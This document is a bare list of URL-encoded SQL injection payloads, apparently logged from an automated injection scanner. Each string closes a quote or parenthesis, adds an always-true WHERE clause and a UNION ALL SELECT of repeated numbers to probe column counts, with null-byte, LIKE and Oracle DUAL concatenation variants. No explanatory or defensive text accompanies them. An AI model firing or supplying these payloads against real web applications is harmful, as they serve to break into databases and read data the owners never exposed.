-1287%22%20UNION%20ALL%20SELECT%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%00%20AND%20%22fCma%22%20LIKE%20%22fCma -9252%22%20UNION%20ALL%20SELECT%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%2C%209969%00%20AND%20%22orUG%22%20LIKE%20%22orUG -7831%22%20UNION%20ALL%20SELECT%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%2C%207886%00%20AND%20%22CuOs%22%20LIKE%20%22CuOs -2416%29%20WHERE%204620%3D4620%20UNION%20ALL%20SELECT%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%2C%204620%00 -3101%29%20WHERE%207097%3D7097%20UNION%20ALL%20SELECT%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%00 -8809%29%20WHERE%206402%3D6402%20UNION%20ALL%20SELECT%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%2C%206402%00 -3098%29%20WHERE%206056%3D6056%20UNION%20ALL%20SELECT%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%2C%206056%00 -6777%29%20WHERE%207677%3D7677%20UNION%20ALL%20SELECT%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%2C%207677%00 -1960%29%20WHERE%203483%3D3483%20UNION%20ALL%20SELECT%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%2C%203483%00 -4359%29%20WHERE%204179%3D4179%20UNION%20ALL%20SELECT%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%2C%204179%00 -1598%29%20WHERE%208867%3D8867%20UNION%20ALL%20SELECT%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%2C%208867%00 -1296%29%20WHERE%207063%3D7063%20UNION%20ALL%20SELECT%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%00 -1474%29%20WHERE%202917%3D2917%20UNION%20ALL%20SELECT%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%00 -8357%27%29%20WHERE%205332%3D5332%20UNION%20ALL%20SELECT%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%2C%205332%00 -7819%27%29%20WHERE%204212%3D4212%20UNION%20ALL%20SELECT%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%00 -5256%27%29%20WHERE%203514%3D3514%20UNION%20ALL%20SELECT%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%2C%203514%00 -2473%27%29%20WHERE%204050%3D4050%20UNION%20ALL%20SELECT%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%00 -3154%27%29%20WHERE%207946%3D7946%20UNION%20ALL%20SELECT%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%00 -9723%27%29%20WHERE%205762%3D5762%20UNION%20ALL%20SELECT%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%00 -9767%27%29%20WHERE%206361%3D6361%20UNION%20ALL%20SELECT%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%00 -9604%27%29%20WHERE%207127%3D7127%20UNION%20ALL%20SELECT%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%2C%207127%00 -4144%27%29%20WHERE%205974%3D5974%20UNION%20ALL%20SELECT%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%00 -9771%27%29%20WHERE%208552%3D8552%20UNION%20ALL%20SELECT%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%00 -3092%27%20WHERE%203774%3D3774%20UNION%20ALL%20SELECT%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%00 -2276%27%20WHERE%202580%3D2580%20UNION%20ALL%20SELECT%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%2C%202580%00 -4866%27%20WHERE%202119%3D2119%20UNION%20ALL%20SELECT%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%2C%202119%00 -6550%27%20WHERE%208551%3D8551%20UNION%20ALL%20SELECT%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%2C%208551%00 -7367%27%20WHERE%201983%3D1983%20UNION%20ALL%20SELECT%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%00 -1903%27%20WHERE%209098%3D9098%20UNION%20ALL%20SELECT%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%00 -7490%27%20WHERE%205510%3D5510%20UNION%20ALL%20SELECT%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%00 -1065%27%20WHERE%204955%3D4955%20UNION%20ALL%20SELECT%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%2C%204955%00 -3035%27%20WHERE%205106%3D5106%20UNION%20ALL%20SELECT%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%2C%205106%00 -4512%27%20WHERE%201233%3D1233%20UNION%20ALL%20SELECT%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%2C%201233%00 -2027%22%20WHERE%203204%3D3204%20UNION%20ALL%20SELECT%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%00 -2618%22%20WHERE%206097%3D6097%20UNION%20ALL%20SELECT%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%2C%206097%00 -5304%22%20WHERE%204128%3D4128%20UNION%20ALL%20SELECT%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%00 -5510%22%20WHERE%209651%3D9651%20UNION%20ALL%20SELECT%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%2C%209651%00 -4166%22%20WHERE%205342%3D5342%20UNION%20ALL%20SELECT%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%2C%205342%00 -4839%22%20WHERE%202165%3D2165%20UNION%20ALL%20SELECT%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%2C%202165%00 -3722%22%20WHERE%201466%3D1466%20UNION%20ALL%20SELECT%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%2C%201466%00 -3969%22%20WHERE%206717%3D6717%20UNION%20ALL%20SELECT%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%2C%206717%00 -8875%22%20WHERE%207726%3D7726%20UNION%20ALL%20SELECT%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%2C%207726%00 -6935%22%20WHERE%204727%3D4727%20UNION%20ALL%20SELECT%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%00 -9441%27%20%7C%7C%20%28SELECT%209507%20FROM%20DUAL%20WHERE%206936%3D6936%20UNION%20ALL%20SELECT%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%00%20%29%20%7C%7C%20%27 -6864%27%20%7C%7C%20%28SELECT%202282%20FROM%20DUAL%20WHERE%203243%3D3243%20UNION%20ALL%20SELECT%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%00%20%29%20%7C%7C%20%27 -5980%27%20%7C%7C%20%28SELECT%201178%20FROM%20DUAL%20WHERE%208419%3D8419%20UNION%20ALL%20SELECT%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%00%20%29%20%7C%7C%20%27 -1919%27%20%7C%7C%20%28SELECT%209378%20FROM%20DUAL%20WHERE%202184%3D2184%20UNION%20ALL%20SELECT%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%2C%202184%00%20%29%20%7C%7C%20%27 -6478%27%20%7C%7C%20%28SELECT%201366%20FROM%20DUAL%20WHERE%201070%3D1070%20UNION%20ALL%20SELECT%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%00%20%29%20%7C%7C%20%27 -2863%27%20%7C%7C%20%28SELECT%207190%20FROM%20DUAL%20WHERE%208917%3D8917%20UNION%20ALL%20SELECT%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%2C%208917%00%20%29%20%7C%7C%20%27 -6171%27%20%7C%7C%20%28SELECT%203082%20FROM%20DUAL%20WHERE%201360%3D1360%20UNION%20ALL%20SELECT%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%2C%201360%00%20%29%20%7C%7C%20%27 -3756%27%20%7C%7C%20%28SELECT%204090%20FROM%20DUAL%20WHERE%202429%3D2429%20UNION%20ALL%20SELECT%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%2C%202429%00%20%29%20%7C%7C%20%27 -3506%27%20%7C%7C%20%28SELECT%209068%20FROM%20DUAL%20WHERE%201346%3D1346%20UNION%20ALL%20SELECT%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%00%20%29%20%7C%7C%20%27 -5996%27%20%7C%7C%20%28SELECT%207393%20FROM%20DUAL%20WHERE%206858%3D6858%20UNION%20ALL%20SELECT%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%2C%206858%00%20%29%20%7C%7C%20%27 -4932%27%20%7C%7C%20%28SELECT%207036%20WHERE%207887%3D7887%20UNION%20ALL%20SELECT%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%2C%207887%00%20%29%20%7C%7C%20%27 -8350%27%20%7C%7C%20%28SELECT%207522%20WHERE%208497%3D8497%20UNION%20ALL%20SELECT%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%00%20%29%20%7C%7C%20%27 -3248%27%20%7C%7C%20%28SELECT%206021%20WHERE%207097%3D7097%20UNION%20ALL%20SELECT%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%00%20%29%20%7C%7C%20%27 -5130%27%20%7C%7C%20%28SELECT%208713%20WHERE%201820%3D1820%20UNION%20ALL%20SELECT%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%2C%201820%00%20%29%20%7C%7C%20%27 